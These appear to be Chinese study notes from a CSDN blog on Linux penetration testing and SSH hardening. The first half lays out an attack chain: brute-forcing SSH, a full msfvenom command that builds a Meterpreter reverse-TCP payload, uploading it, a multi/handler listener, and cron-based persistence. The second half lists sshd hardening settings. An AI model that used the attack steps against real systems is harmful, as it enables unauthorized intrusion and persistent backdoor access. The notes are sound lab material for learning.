爆破工具:Hydra、Medeusa、msf
重要单词:session,Venom(毒液)
top 任务管理器
pgrep 查找运行的进程
-l 列出进程名称
pkill 终止进程 跟进程名称
-9 强制
kill -9 PID
sleep 暂停
vsftpd 2.3.4-笑脸漏洞利用
1.收集信息
2.暴力破解
ssh_login
3.登录
4.上传后门脚本
生成payload
msfvenom -p选择载荷
-f选择文件格式exe/elf
lhost 监听地址
lport 监听端口
-o 输出文件名
-h 帮助
例:msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.10.224 lport=4444 -f elf -o /root/pay
scp 上传文件
可能会有权限不足的问题导致无法运行,需要获得执行权限
运行木马,要绝对路径
5.侦听脚本
└─# msfconsole -q
msf6 > use exploit/multi/handler
> set payload linux/x86/meterpreter/reverse_tcp
6.制定脚本自动运行计划任务
crontab 计划任务
-e 编辑计划任务
-l 显示计划任务
EDITOR=vim crontab -e
-》# m h dom mon dow command
min,每小时第几分钟
hour ,每天第几小时
day of month 每月第几天
day of week 每周第几天
全*为每分钟运行一次
background 可以把进程放入后台
show sessions 显示进程
sessions x进入进程x
linux安全加固
/etc/ssh/sshd_config ssh配置文件
1.修改默认端口
Port
2.禁止root远程登录
PermitRootLogin no
3.设置密码输入次数
MaxAuthTries 2
4.设置远程白名单
AllowUsers zhangsan@192.168.10.1
5.登录时间限制
LoginGraceTime 60
6.终端超时退出
/etc/profile
export TMOUT=30 超过30s自动断开连接
7.定期更改密码
/etc/login.defs
PASS_MAX_DAYS 修改新建用户默认密码使用时间·
chage -l 列出用户密码使用天数
chage -M 30 UserName 修改用户最大密码使用期限
8.添加ssh公钥认证
使用 MobaXterm
rm -rf /home/mobaxterm/.ssh/* 删除当前密钥
ssh-keygen 生成密钥
ssh-copy-id root@192.168.10.143 上传公钥
win_cmd
使用公钥时禁用密码认证
PermitEmptyPasswords no
标签:etc,渗透,linux,192.168,密码,ssh,Linux,加固,进程 From: https://blog.csdn.net/m0_71332744/article/details/140116495